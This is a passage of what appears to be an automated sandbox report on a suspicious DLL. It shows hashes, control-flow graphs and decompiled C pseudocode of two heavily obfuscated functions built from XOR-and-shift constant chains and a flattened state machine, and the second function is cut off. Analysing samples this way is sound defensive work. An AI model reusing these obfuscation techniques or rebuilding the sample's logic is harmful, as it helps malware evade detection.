                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: $P$%Z$+f%$.5$.7Y$L$Q/O$h$p(}$spC$3k$n,
                          • API String ID: 0-500290626
                          • Opcode ID: 703d3be78635114d7b4e2f9817d4a336407b4bd0acf1305019185604f27b559c
                          • Instruction ID: 5aa1ad4c1764df0a0249975c4fdf4712284a8ad39ae5cd9d41aebe5167f35bd7
                          • Opcode Fuzzy Hash: 703d3be78635114d7b4e2f9817d4a336407b4bd0acf1305019185604f27b559c
                          • Instruction Fuzzy Hash: AC12F1714093809FD3A9CF60C98AA8BFBE1FBC4348F108A1DE1DA96260D7B58549CF57
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 660 d4d1bc-d4d5dd call d4fe29 663 d4d5e8 660->663 664 d4d5ed-d4d5f3 663->664 665 d4d78f-d4d795 664->665 666 d4d5f9 664->666 667 d4d870-d4d8aa call d4fe2a 665->667 668 d4d79b-d4d7a1 665->668 669 d4d5ff-d4d605 666->669 670 d4d708-d4d774 call d467e6 666->670 696 d4d8b1 667->696 671 d4d7a7-d4d7ad 668->671 672 d4d851-d4d86b call d52b09 668->672 673 d4d6c8-d4d6dd 669->673 674 d4d60b-d4d611 669->674 686 d4d776-d4d77b 670->686 687 d4d780 670->687 679 d4d801-d4d84f call d52b09 * 3 671->679 680 d4d7af-d4d7b1 671->680 699 d4d785-d4d78a 672->699 683 d4d6e6-d4d6ed call d42e5d 673->683 684 d4d6df-d4d6e4 call d380c0 673->684 681 d4d691-d4d6a8 674->681 682 d4d613-d4d619 674->682 679->696 691 d4d8b6-d4d8bc 680->691 692 d4d7b7-d4d7fc call d4cca0 call d3e404 680->692 688 d4d6b0-d4d6b8 681->688 689 d4d6aa-d4d6ad 681->689 693 d4d65f-d4d681 call d45779 682->693 694 d4d61b-d4d621 682->694 708 d4d6f2-d4d703 683->708 684->708 686->663 687->699 704 d4d8c4-d4d8ca 688->704 705 d4d6be-d4d6c3 688->705 689->688 691->664 707 d4d8c2 691->707 692->663 713 d4d8ce-d4d8da 693->713 717 d4d687-d4d68c 693->717 694->691 701 d4d627-d4d647 call d36b7a 694->701 696->691 699->663 720 d4d653 701->720 721 d4d649-d4d651 701->721 704->713 705->663 707->713 708->664 717->663 722 d4d658-d4d65d 720->722 721->722 722->663
                          C-Code - Quality: 86%
                          			E00D4D1BC(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                          				char _v260;
                          				char _v268;
                          				intOrPtr _v272;
                          				char _v276;
                          				intOrPtr _v280;
                          				char _v284;
                          				intOrPtr _v288;
                          				signed int _v292;
                          				signed int _v296;
                          				signed int _v300;
                          				signed int _v304;
                          				signed int _v308;
                          				signed int _v312;
                          				signed int _v316;
                          				signed int _v320;
                          				signed int _v324;
                          				signed int _v328;
                          				signed int _v332;
                          				signed int _v336;
                          				signed int _v340;
                          				signed int _v344;
                          				signed int _v348;
                          				signed int _v352;
                          				signed int _v356;
                          				signed int _v360;
                          				signed int _v364;
                          				signed int _v368;
                          				signed int _v372;
                          				signed int _v376;
                          				signed int _v380;
                          				signed int _v384;
                          				signed int _v388;
                          				signed int _v392;
                          				signed int _v396;
                          				signed int _v400;
                          				signed int _v404;
                          				signed int _v408;
                          				signed int _v412;
                          				signed int _v416;
                          				void* _t309;
                          				void* _t322;
                          				intOrPtr _t325;
                          				intOrPtr _t328;
                          				intOrPtr _t332;
                          				void* _t336;
                          				intOrPtr _t338;
                          				intOrPtr _t340;
                          				intOrPtr _t341;
                          				void* _t343;
                          				intOrPtr _t346;
                          				void* _t349;
                          				intOrPtr _t364;
                          				intOrPtr _t365;
                          				void* _t382;
                          				intOrPtr _t385;
                          				void* _t390;
                          				signed int _t391;
                          				signed int _t392;
                          				signed int _t393;
                          				intOrPtr _t394;
                          				void* _t395;
                          				void* _t396;
                          				void* _t397;
                          				void* _t399;
                          
                          				_push(_a24);
                          				_t395 = __edx;
                          				_push(_a20);
                          				_v288 = __ecx;
                          				_push(_a16);
                          				_push(_a12);
                          				_push(_a8);
                          				_push(_a4);
                          				_push(__edx);
                          				_push(__ecx);
                          				E00D4FE29(__ecx);
                          				_v312 = 0xeda4ef;
                          				_t397 = _t396 + 0x20;
                          				_v312 = _v312 + 0x7c87;
                          				_v312 = _v312 ^ 0x00e6bc42;
                          				_t346 = 0;
                          				_v356 = 0x83a7cc;
                          				_t349 = 0x902256d;
                          				_v356 = _v356 << 0xd;
                          				_v356 = _v356 | 0xd496e6a5;
                          				_v356 = _v356 ^ 0xf4f8676c;
                          				_v388 = 0x254bab;
                          				_v388 = _v388 | 0x2708e00f;
                          				_v388 = _v388 << 0xc;
                          				_v388 = _v388 << 0xa;
                          				_v388 = _v388 ^ 0xebca5aa3;
                          				_v376 = 0x3a43eb;
                          				_v376 = _v376 + 0x5e30;
                          				_v376 = _v376 ^ 0x2d5dec97;
                          				_v376 = _v376 ^ 0x2d6492cf;
                          				_v324 = 0x965e68;
                          				_v324 = _v324 ^ 0x4fad172c;
                          				_v324 = _v324 ^ 0x4f30eea0;
                          				_v404 = 0x95ea8f;
                          				_t391 = 0x3c;
                          				_v404 = _v404 / _t391;
                          				_v404 = _v404 << 0xc;
                          				_v404 = _v404 | 0x93230375;
                          				_v404 = _v404 ^ 0xb7f3bbc9;
                          				_v296 = 0x950835;
                          				_v296 = _v296 + 0xffff217e;
                          				_v296 = _v296 ^ 0x0090010d;
                          				_v412 = 0x146e3b;
                          				_v412 = _v412 ^ 0xfee339d3;
                          				_v412 = _v412 | 0x08dab50c;
                          				_v412 = _v412 << 5;
                          				_v412 = _v412 ^ 0xdff21b2d;
                          				_v316 = 0x73cd3;
                          				_v316 = _v316 << 0xb;
                          				_v316 = _v316 ^ 0x39e53ce3;
                          				_v304 = 0x17d1c9;
                          				_v304 = _v304 | 0x32076b61;
                          				_v304 = _v304 ^ 0x32193df4;
                          				_v400 = 0xe22ffc;
                          				_v400 = _v400 * 0xf;
                          				_v400 = _v400 << 8;
                          				_v400 = _v400 >> 5;
                          				_v400 = _v400 ^ 0x020db90e;
                          				_v360 = 0x4e823d;
                          				_v360 = _v360 >> 7;
                          				_v360 = _v360 >> 0xc;
                          				_v360 = _v360 ^ 0x000f4c82;
                          				_v332 = 0x37cdc;
                          				_v332 = _v332 >> 0xe;
                          				_v332 = _v332 ^ 0x000cfe6d;
                          				_v392 = 0x36521e;
                          				_v392 = _v392 << 2;
                          				_v392 = _v392 ^ 0x01f25d84;
                          				_v392 = _v392 + 0xffff6602;
                          				_v392 = _v392 ^ 0x0122fac3;
                          				_v292 = 0x811559;
                          				_v292 = _v292 ^ 0x63e4ed2d;
                          				_v292 = _v292 ^ 0x636b0aa2;
                          				_v408 = 0xc9a98b;
                          				_v408 = _v408 ^ 0x273a7ab7;
                          				_t392 = 0x3d;
                          				_v408 = _v408 / _t392;
                          				_v408 = _v408 | 0xd16a0a28;
                          				_v408 = _v408 ^ 0xd1e35630;
                          				_v352 = 0x4de238;
                          				_v352 = _v352 ^ 0xe481f79a;
                          				_v352 = _v352 ^ 0xe4c0c54b;
                          				_v340 = 0x7e756a;
                          				_v340 = _v340 << 0xb;
                          				_v340 = _v340 ^ 0xf3ae0159;
                          				_v384 = 0x3029be;
                          				_v384 = _v384 + 0x835e;
                          				_v384 = _v384 ^ 0x9e5eea44;
                          				_v384 = _v384 ^ 0x9e65521f;
                          				_v364 = 0xcf8251;
                          				_v364 = _v364 + 0xffff400c;
                          				_t393 = 0x78;
                          				_v364 = _v364 * 0x5a;
                          				_v364 = _v364 ^ 0x48b0c21e;
                          				_v320 = 0x2b8f03;
                          				_v320 = _v320 << 7;
                          				_v320 = _v320 ^ 0x15cafa02;
                          				_v372 = 0xb0a86a;
                          				_v372 = _v372 ^ 0x35b8bfe6;
                          				_v372 = _v372 ^ 0xed8d6bf1;
                          				_v372 = _v372 ^ 0xd88344ec;
                          				_v344 = 0x8c38;
                          				_v344 = _v344 ^ 0x1ac013b0;
                          				_v344 = _v344 ^ 0x1ac5368a;
                          				_v348 = 0x2c1ac3;
                          				_v348 = _v348 >> 6;
                          				_v348 = _v348 ^ 0x0005c30d;
                          				_v300 = 0x3ae4ba;
                          				_v300 = _v300 >> 0xe;
                          				_v300 = _v300 ^ 0x00012364;
                          				_v396 = 0xe1901;
                          				_v396 = _v396 << 0xe;
                          				_v396 = _v396 + 0x39a8;
                          				_v396 = _v396 ^ 0x864e7189;
                          				_v368 = 0xe5c11e;
                          				_t394 = _v288;
                          				_v368 = _v368 / _t393;
                          				_v368 = _v368 | 0x7320cec6;
                          				_v368 = _v368 ^ 0x73273aba;
                          				_v336 = 0xf33546;
                          				_v336 = _v336 ^ 0x37961faf;
                          				_v336 = _v336 ^ 0x37663e0b;
                          				_v328 = 0x922129;
                          				_v328 = _v328 | 0xf90cd049;
                          				_v328 = _v328 ^ 0xf99851f2;
                          				_v416 = 0x9fd52c;
                          				_v416 = _v416 << 2;
                          				_v416 = _v416 * 0x22;
                          				_v416 = _v416 + 0xffff9e7e;
                          				_v416 = _v416 ^ 0x54e779e0;
                          				_v380 = 0x615361;
                          				_v380 = _v380 >> 1;
                          				_v380 = _v380 + 0x673e;
                          				_v380 = _v380 ^ 0x003e049c;
                          				_v308 = 0x9da5c1;
                          				_v308 = _v308 + 0xf72;
                          				_v308 = _v308 ^ 0x009db133;
                          				while(1) {
                          					L1:
                          					_t309 = 0xe35a561;
                          					do {
                          						while(1) {
                          							L2:
                          							_t399 = _t349 - 0x8816d6a;
                          							if(_t399 > 0) {
                          								break;
                          							}
                          							if(_t399 == 0) {
                          								_t325 =  *0xd56228; // 0x0
                          								_t328 =  *0xd56228; // 0x0
                          								_t332 =  *0xd56228; // 0x0
                          								_t336 = E00D467E6(_t394, _v400, _v360, _v332, _v392,  &_v268,  *( *((intOrPtr*)(_t332 + 4)) + 0x14) & 0x0000ffff, _v292,  &_v276,  *( *((intOrPtr*)(_t328 + 4)) + 0x44) & 0x0000ffff, _v408,  *((intOrPtr*)(_t325 + 4)) + 0x20, _v352,  &_v260);
                          								_t397 = _t397 + 0x30;
                          								if(_t336 == 0) {
                          									L25:
                          									_t349 = 0xc732dcb;
                          									while(1) {
                          										L1:
                          										_t309 = 0xe35a561;
                          										goto L2;
                          									}
                          								} else {
                          									_t349 = 0x772d3d2;
                          									while(1) {
                          										L1:
                          										_t309 = 0xe35a561;
                          										goto L2;
                          									}
                          								}
                          							} else {
                          								if(_t349 == 0x200f7b2) {
                          									if(_v280 >= _v308) {
                          										_t338 = E00D42E5D( &_v284,  &_v276);
                          									} else {
                          										_t338 = E00D380C0( &_v284);
                          									}
                          									_t394 = _t338;
                          									_t309 = 0xe35a561;
                          									_t349 =  !=  ? 0xe35a561 : 0xc732dcb;
                          									continue;
                          								} else {
                          									if(_t349 == 0x323c58a) {
                          										_t364 =  *0xd56228; // 0x0
                          										_t340 =  *((intOrPtr*)( *((intOrPtr*)(_t364 + 4)) + 0x18));
                          										 *((intOrPtr*)(_t364 + 0x1c)) =  *((intOrPtr*)(_t364 + 0x1c)) + 1;
                          										_t385 =  *((intOrPtr*)(_t364 + 0x1c));
                          										 *((intOrPtr*)(_t364 + 4)) = _t340;
                          										if(_t340 == 0) {
                          											 *((intOrPtr*)(_t364 + 4)) =  *((intOrPtr*)(_t364 + 0x14));
                          										}
                          										_t341 =  *0xd56228; // 0x0
                          										if(_t385 >=  *((intOrPtr*)(_t341 + 0x18))) {
                          											_t365 =  *0xd56228; // 0x0
                          											 *(_t365 + 0x1c) =  *(_t365 + 0x1c) & 0x00000000;
                          										} else {
                          											_t349 = 0x902256d;
                          											while(1) {
                          												L1:
                          												_t309 = 0xe35a561;
                          												goto L2;
                          											}
                          										}
                          									} else {
                          										if(_t349 == 0x54cb160) {
                          											_t343 = E00D45779( &_v284, _t395, _v388, _v376, _v288);
                          											_t397 = _t397 + 0xc;
                          											if(_t343 != 0) {
                          												_t349 = 0x200f7b2;
                          												while(1) {
                          													L1:
                          													_t309 = 0xe35a561;
                          													goto L2;
                          												}
                          											}
                          										} else {
                          											if(_t349 != 0x772d3d2) {
                          												goto L35;
                          											} else {
                          												if(E00D36B7A(_v340, _a16, _v384,  &_v268) == 0) {
                          													_t390 = 0x323c58a;
                          												} else {
                          													_t390 = 0x72c7f38;
                          													_t346 = 1;
                          												}
                          												_t349 = 0x939e27d;
                          												while(1) {
                          													L1:
                          													_t309 = 0xe35a561;
                          													goto L2;
                          												}
                          											}
                          										}
                          									}
                          								}
                          							}
                          							L38:
                          							return _t346;
                          						}
                          						if(_t349 == 0x902256d) {
                          							_t394 = 0;
                          							E00D4FE2A(_v312, _v356, 0x100,  &_v260);
                          							_v276 = 0;
                          							_t349 = 0x54cb160;
                          							_v272 = 0;
                          							_v284 = 0;
                          							_v280 = 0;
                          							goto L34;
                          						} else {
                          							if(_t349 == 0x939e27d) {
                          								E00D52B09(_v364, _v268, _v320, _v372);
                          								goto L25;
                          							} else {
                          								if(_t349 == 0xc732dcb) {
                          									E00D52B09(_v344, _v284, _v348, _v300);
                          									E00D52B09(_v396, _t394, _v368, _v336);
                          									E00D52B09(_v328, _v276, _v416, _v380);
                          									_t397 = _t397 + 0x18;
                          									_t349 = _t390;
                          									L34:
                          									_t309 = 0xe35a561;
                          									goto L35;
                          								} else {
                          									if(_t349 != _t309) {
                          										goto L35;
                          									} else {
                          										_push(_t349);
                          										_push(_t349);
                          										_t322 = E00D4CCA0(1, 0x40);
                          										_push( &_v260);
                          										_push(_t322);
                          										_push(_v304);
                          										_t382 = 0xb;
                          										E00D3E404(_v316, _t382);
                          										_t397 = _t397 + 0x1c;
                          										_t349 = 0x8816d6a;
                          										goto L1;
                          									}
                          								}
                          							}
                          						}
                          						goto L38;
                          						L35:
                          					} while (_t349 != 0x72c7f38);
                          					goto L38;
                          				}
                          			}


                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: -c$0^$8M$>g$aSa$ju~$}9$}9$<9$C:$yT$yT
                          • API String ID: 0-111235429
                          • Opcode ID: 7f51079882fc0043c8c461943041d96ec1b3abd1ffe81ec5c7abc97823502865
                          • Instruction ID: 75ef86c3b251c03b92154c2cae1d2690777ff5c252941bb9756c73e3ce92632e
                          • Opcode Fuzzy Hash: 7f51079882fc0043c8c461943041d96ec1b3abd1ffe81ec5c7abc97823502865
                          • Instruction Fuzzy Hash: C90220711083809FD369CF25C48AA6BBBE1FB84348F50891DF6DA86261C7B1C949CF63
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          control_flow_graph 724 d357b8-d36307 call d4fe29 727 d36312 724->727 728 d36317 727->728 729 d3631c-d36322 728->729 730 d36578-d3657e 729->730 731 d36328 729->731 732 d36584-d3658a 730->732 733 d3668f-d366b7 call d512c1 730->733 734 d3648f-d36569 call d4e1f8 * 2 call d3738a call d4fecb * 2 731->734 735 d3632e-d36330 731->735 740 d36641-d3668a call d3c5d8 732->740 741 d36590-d36596 732->741 758 d366bc-d366cb 733->758 784 d3656e-d36573 734->784 736 d36336-d36338 735->736 737 d3641d-d3648a call d31bc9 735->737 744 d366de-d366fd call d3f7fe 736->744 745 d3633e-d36340 736->745 737->728 740->729 742 d36637-d3663c 741->742 743 d3659c-d365a2 741->743 742->729 751 d366d0-d366d6 743->751 752 d365a8-d36632 call d4e1f8 call d3f288 call d4fecb 743->752 766 d366fe-d3670a 744->766 753 d363d0-d3641b call d322c9 745->753 754 d36346-d3634c 745->754 751->729 759 d366dc 751->759 752->784 776 d363a3-d363a7 753->776 761 d3634e-d36350 754->761 762 d363ac-d363ce call d52b09 754->762 758->751 759->766 761->751 768 d36356-d363a0 call d4cbe9 761->768 762->776 768->776 776->727 784->758
                          C-Code - Quality: 94%
                          			E00D357B8(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                          				char _v8;
                          				void _v12;
                          				void _v16;
                          				char _v20;
                          				intOrPtr _v24;
                          				char _v28;
                          				char _v32;
                          				signed int _v36;
                          				signed int _v40;
                          				signed int _v44;
                          				signed int _v48;
                          				signed int _v52;
                          				signed int _v56;
                          				unsigned int _v60;
                          				signed int _v64;
                          				signed int _v68;
                          				signed int _v72;
                          				signed int _v76;
                          				signed int _v80;
                          				signed int _v84;
                          				signed int _v88;
                          				signed int _v92;
                          				signed int _v96;
                          				signed int _v100;
                          				signed int _v104;
                          				signed int _v108;
                          				signed int _v112;
                          				signed int _v116;
                          				signed int _v120;
                          				signed int _v124;
                          				signed int _v128;
                          				signed int _v132;
                          				signed int _v136;
                          				signed int _v140;
                          				signed int _v144;
                          				signed int _v148;
                          				signed int _v152;
                          				signed int _v156;
                          				signed int _v160;
                          				signed int _v164;
                          				signed int _v168;
                          				signed int _v172;
                          				signed int _v176;
                          				signed int _v180;
                          				signed int _v184;
                          				signed int _v188;
                          				signed int _v192;
                          				signed int _v196;
                          				signed int _v200;
                          				signed int _v204;
                          				signed int _v208;
                          				signed int _v212;
                          				signed int _v216;
                          				signed int _v220;
                          				intOrPtr _v224;
                          				signed int _v228;
                          				signed int _v232;
                          				signed int _v236;
                          				signed int _v240;
                          				signed int _v244;
                          				signed int _v248;
                          				signed int _v252;
                          				signed int _v256;
                          				signed int _v260;
                          				signed int _v264;
                          				signed int _v268;
                          				signed int _v272;
                          				signed int _v276;
                          				signed int _v280;
                          				signed int _v284;
                          				signed int _v288;
                          				signed int _v292;
                          				signed int _v296;
                          				signed int _v300;
                          				signed int _v304;
                          				signed int _v308;
                          				signed int _v312;
                          				signed int _v316;
                          				signed int _v320;
                          				void* _t657;
                          				intOrPtr _t715;
                          				void* _t716;
                          				void* _t717;
                          				void* _t725;
                          				void* _t729;
                          				void* _t737;
                          				void* _t740;
                          				intOrPtr _t746;
                          				void* _t798;
                          				void* _t814;
                          				signed int _t816;
                          				signed int _t817;
                          				signed int _t818;
                          				signed int _t819;
                          				signed int _t820;
                          				signed int _t821;
                          				signed int _t822;
                          				signed int _t823;
                          				signed int _t824;
                          				signed int _t825;
                          				signed int _t826;
                          				signed int _t827;
                          				signed int _t828;
                          				void* _t829;
                          				void* _t832;
                          				void* _t833;
                          				void* _t834;
                          				void* _t840;
                          
                          				_push(_a24);
                          				_t746 = __edx;
                          				_push(_a20);
                          				_v224 = __edx;
                          				_push(_a16);
                          				_push(_a12);
                          				_push(_a8);
                          				_push(_a4);
                          				_push(__edx);
                          				_push(0x20);
                          				E00D4FE29(_t657);
                          				_v108 = 0x7f0a1;
                          				_t834 = _t833 + 0x20;
                          				_t832 = 0;
                          				_t740 = 0xa8b367c;
                          				_t816 = 0x72;
                          				_v108 = _v108 / _t816;
                          				_v108 = _v108 ^ 0x000011d4;
                          				_v220 = 0x3ea28;
                          				_v220 = _v220 | 0x6e60dce4;
                          				_v220 = _v220 << 0xd;
                          				_v220 = _v220 ^ 0x7fdd8000;
                          				_v272 = 0xf906dc;
                          				_v272 = _v272 + 0x5e9;
                          				_t817 = 0x7a;
                          				_v272 = _v272 * 0x15;
                          				_v272 = _v272 << 0xb;
                          				_v272 = _v272 ^ 0x70614800;
                          				_v264 = 0x600b37;
                          				_v264 = _v264 / _t817;
                          				_v264 = _v264 ^ 0x262493f0;
                          				_t818 = 0x3e;
                          				_v264 = _v264 * 0x11;
                          				_v264 = _v264 ^ 0x886a01f8;
                          				_v260 = 0xf3d497;
                          				_v260 = _v260 / _t818;
                          				_v260 = _v260 >> 6;
                          				_v260 = _v260 >> 3;
                          				_v260 = _v260 ^ 0x000001f7;
                          				_v156 = 0x8d2235;
                          				_v156 = _v156 >> 0xe;
                          				_t819 = 0xe;
                          				_v156 = _v156 * 0x5b;
                          				_v156 = _v156 ^ 0x0000c87c;
                          				_v292 = 0xf4d;
                          				_v292 = _v292 + 0x4732;
                          				_v292 = _v292 << 0x10;
                          				_v292 = _v292 << 0xe;
                          				_v292 = _v292 ^ 0xc0000000;
                          				_v216 = 0x258eaf;
                          				_v216 = _v216 * 0x48;
                          				_v216 = _v216 / _t819;
                          				_v216 = _v216 ^ 0x00c126f1;
                          				_v96 = 0xf75e54;
                          				_v96 = _v96 + 0xffff74b2;
                          				_v96 = _v96 ^ 0x00f6d306;
                          				_v268 = 0x92da;
                          				_v268 = _v268 >> 0xc;
                          				_v268 = _v268 + 0x1646;
                          				_v268 = _v268 << 0xd;
                          				_v268 = _v268 ^ 0x02c9e000;
                          				_v196 = 0xf0429c;
                          				_t820 = 0x3d;
                          				_v196 = _v196 * 0x60;
                          				_v196 = _v196 >> 3;
                          				_v196 = _v196 ^ 0x0b431f50;
                          				_v232 = 0x6bfae5;
                          				_v232 = _v232 / _t820;
                          				_v232 = _v232 >> 4;
                          				_v232 = _v232 * 0x6e;
                          				_v232 = _v232 ^ 0x000c2b3c;
                          				_v40 = 0xa24143;
                          				_v40 = _v40 + 0xffff9191;
                          				_v40 = _v40 ^ 0x00a231cd;
                          				_v80 = 0x435983;
                          				_v80 = _v80 >> 0x10;
                          				_v80 = _v80 ^ 0x000556e3;
                          				_v180 = 0x94eafd;
                          				_v180 = _v180 + 0x1d08;
                          				_v180 = _v180 | 0xe944a694;
                          				_v180 = _v180 ^ 0xe9df3ebb;
                          				_v228 = 0xbcce84;
                          				_v228 = _v228 + 0xffff815d;
                          				_v228 = _v228 ^ 0xe4fbb881;
                          				_v228 = _v228 >> 0xe;
                          				_v228 = _v228 ^ 0x0005fd7e;
                          				_v112 = 0x2fdad;
                          				_v112 = _v112 ^ 0x4ab81af1;
                          				_v112 = _v112 ^ 0x4abb9e1a;
                          				_v64 = 0x50dc85;
                          				_v64 = _v64 + 0xffff4d8c;
                          				_v64 = _v64 ^ 0x005cdb40;
                          				_v52 = 0x47f34d;
                          				_v52 = _v52 + 0xffff898a;
                          				_v52 = _v52 ^ 0x004c7feb;
                          				_v72 = 0xc369b0;
                          				_v72 = _v72 * 0x64;
                          				_v72 = _v72 ^ 0x4c5d6799;
                          				_v132 = 0xe6e6b0;
                          				_v132 = _v132 >> 0xb;
                          				_v132 = _v132 * 0x6c;
                          				_v132 = _v132 ^ 0x00059f00;
                          				_v172 = 0x544ea4;
                          				_v172 = _v172 << 5;
                          				_v172 = _v172 | 0xc018668b;
                          				_v172 = _v172 ^ 0xca962b34;
                          				_v148 = 0x61f17d;
                          				_v148 = _v148 >> 0xc;
                          				_v148 = _v148 + 0xffff8980;
                          				_v148 = _v148 ^ 0xfffa8c30;
                          				_v100 = 0xf619bc;
                          				_v100 = _v100 >> 0xa;
                          				_v100 = _v100 ^ 0x00008a95;
                          				_v200 = 0xa94e7a;
                          				_v200 = _v200 + 0xa696;
                          				_v200 = _v200 + 0xffff4550;
                          				_v200 = _v200 ^ 0x00a03757;
                          				_v208 = 0x57e0ef;
                          				_v208 = _v208 ^ 0x592bbff9;
                          				_v208 = _v208 ^ 0x4b5d2b88;
                          				_v208 = _v208 ^ 0x1221726f;
                          				_v284 = 0x804076;
                          				_v284 = _v284 ^ 0x9dc3529f;
                          				_v284 = _v284 + 0x2ad8;
                          				_v284 = _v284 << 7;
                          				_v284 = _v284 ^ 0xa19e17b3;
                          				_v176 = 0xb506b1;
                          				_v176 = _v176 | 0xc528794d;
                          				_v176 = _v176 + 0x810e;
                          				_v176 = _v176 ^ 0xc5bbfa9c;
                          				_v184 = 0x64408f;
                          				_v184 = _v184 << 3;
                          				_v184 = _v184 >> 0xf;
                          				_v184 = _v184 ^ 0x00066ce1;
                          				_v252 = 0x9e8dfe;
                          				_v252 = _v252 | 0x2316ff28;
                          				_v252 = _v252 + 0xbb4b;
                          				_v252 = _v252 ^ 0x205df49d;
                          				_v252 = _v252 ^ 0x03c75996;
                          				_v192 = 0x20a385;
                          				_v192 = _v192 ^ 0x2edbbce0;
                          				_v192 = _v192 >> 5;
                          				_v192 = _v192 ^ 0x017066cd;
                          				_v312 = 0x989161;
                          				_v312 = _v312 + 0xa008;
                          				_v312 = _v312 + 0x4ac;
                          				_v312 = _v312 | 0x9f8d4417;
                          				_v312 = _v312 ^ 0x9f9ed397;
                          				_v320 = 0x6ba986;
                          				_t821 = 0x4d;
                          				_v320 = _v320 * 0x35;
                          				_v320 = _v320 + 0x6b8c;
                          				_v320 = _v320 + 0x347b;
                          				_v320 = _v320 ^ 0x164ad328;
                          				_v236 = 0xcaa528;
                          				_v236 = _v236 + 0x2035;
                          				_v236 = _v236 | 0x7bffa27f;
                          				_v236 = _v236 ^ 0x7bfdb1d6;
                          				_v276 = 0xb040eb;
                          				_v276 = _v276 * 0x3a;
                          				_v276 = _v276 >> 2;
                          				_v276 = _v276 >> 0xb;
                          				_v276 = _v276 ^ 0x00065548;
                          				_v280 = 0xf1680b;
                          				_v280 = _v280 >> 0xa;
                          				_v280 = _v280 >> 1;
                          				_v280 = _v280 >> 0xd;
                          				_v280 = _v280 ^ 0x00049c20;
                          				_v288 = 0x575f50;
                          				_v288 = _v288 << 0xe;
                          				_v288 = _v288 | 0xa77b0e2e;
                          				_v288 = _v288 * 0x52;
                          				_v288 = _v288 ^ 0x6fbbe03a;
                          				_v296 = 0x568d1e;
                          				_v296 = _v296 >> 0xb;
                          				_v296 = _v296 >> 6;
                          				_v296 = _v296 >> 9;
                          				_v296 = _v296 ^ 0x0008fa1d;
                          				_v304 = 0xd1fef6;
                          				_v304 = _v304 << 0x10;
                          				_v304 = _v304 * 0x2d;
                          				_v304 = _v304 << 9;
                          				_v304 = _v304 ^ 0x7c01ef7f;
                          				_v92 = 0xea5a63;
                          				_v92 = _v92 << 0xd;
                          				_v92 = _v92 ^ 0x4b4e4928;
                          				_v76 = 0xf64e35;
                          				_v76 = _v76 + 0xbf9b;
                          				_v76 = _v76 ^ 0x00fbc5d2;
                          				_v248 = 0xc75c6;
                          				_v248 = _v248 ^ 0x54d7d0af;
                          				_v248 = _v248 / _t821;
                          				_v248 = _v248 | 0x9c98695d;
                          				_v248 = _v248 ^ 0x9d9ac3a5;
                          				_v256 = 0x504a74;
                          				_v256 = _v256 | 0x8719e45c;
                          				_v256 = _v256 * 0x7b;
                          				_v256 = _v256 ^ 0x8d2796a4;
                          				_v256 = _v256 ^ 0x85162cc6;
                          				_v84 = 0x519e4e;
                          				_v84 = _v84 ^ 0x8be7953d;
                          				_v84 = _v84 ^ 0x8bbbe938;
                          				_v168 = 0x311266;
                          				_v168 = _v168 ^ 0x18ab2cb8;
                          				_v168 = _v168 << 9;
                          				_v168 = _v168 ^ 0x3478f01c;
                          				_v60 = 0x61fbf7;
                          				_v60 = _v60 >> 0x10;
                          				_v60 = _v60 ^ 0x000e504b;
                          				_v240 = 0xf8ae17;
                          				_v240 = _v240 >> 3;
                          				_v240 = _v240 | 0x050ada64;
                          				_v240 = _v240 ^ 0x567c7cbc;
                          				_v240 = _v240 ^ 0x53659cbf;
                          				_v68 = 0xee6d4a;
                          				_t374 =  &_v68; // 0xee6d4a
                          				_t822 = 0x49;
                          				_v68 =  *_t374 * 0xf;
                          				_v68 = _v68 ^ 0x0dff5dbc;
                          				_v300 = 0x550c32;
                          				_v300 = _v300 * 0x12;
                          				_v300 = _v300 + 0xffff8d7f;
                          				_v300 = _v300 << 1;
                          				_v300 = _v300 ^ 0x0bfb5da9;
                          				_v124 = 0x6baac1;
                          				_v124 = _v124 * 0x60;
                          				_t823 = 0x6f;
                          				_v124 = _v124 / _t822;
                          				_v124 = _v124 ^ 0x0084cf47;
                          				_v188 = 0xec1707;
                          				_v188 = _v188 << 0xc;
                          				_v188 = _v188 + 0x1505;
                          				_v188 = _v188 ^ 0xc1795754;
                          				_v244 = 0xd962f7;
                          				_v244 = _v244 + 0xffffa966;
                          				_v244 = _v244 | 0x93df07c8;
                          				_v244 = _v244 >> 1;
                          				_v244 = _v244 ^ 0x49e87f80;
                          				_v48 = 0x35494e;
                          				_v48 = _v48 / _t823;
                          				_v48 = _v48 ^ 0x000830fa;
                          				_v88 = 0x633bdd;
                          				_v88 = _v88 + 0xc138;
                          				_v88 = _v88 ^ 0x006a2257;
                          				_v56 = 0x559d1c;
                          				_v56 = _v56 + 0xffff12d8;
                          				_v56 = _v56 ^ 0x005735ca;
                          				_v104 = 0xdd1aac;
                          				_v104 = _v104 << 4;
                          				_v104 = _v104 ^ 0x0dd90d21;
                          				_v44 = 0x4278da;
                          				_t824 = 0x4e;
                          				_v44 = _v44 * 0x42;
                          				_v44 = _v44 ^ 0x112c636d;
                          				_v116 = 0x4ec2e;
                          				_v116 = _v116 + 0xffff43d8;
                          				_v116 = _v116 ^ 0x00065017;
                          				_v308 = 0xc5e4c2;
                          				_v308 = _v308 * 0x26;
                          				_v308 = _v308 + 0xa26d;
                          				_v308 = _v308 << 0xe;
                          				_v308 = _v308 ^ 0x25c4a583;
                          				_v36 = 0x60fc2;
                          				_v36 = _v36 * 0x2e;
                          				_v36 = _v36 ^ 0x011987ae;
                          				_v140 = 0x8a5839;
                          				_v140 = _v140 << 0xb;
                          				_v140 = _v140 / _t824;
                          				_v140 = _v140 ^ 0x010a1534;
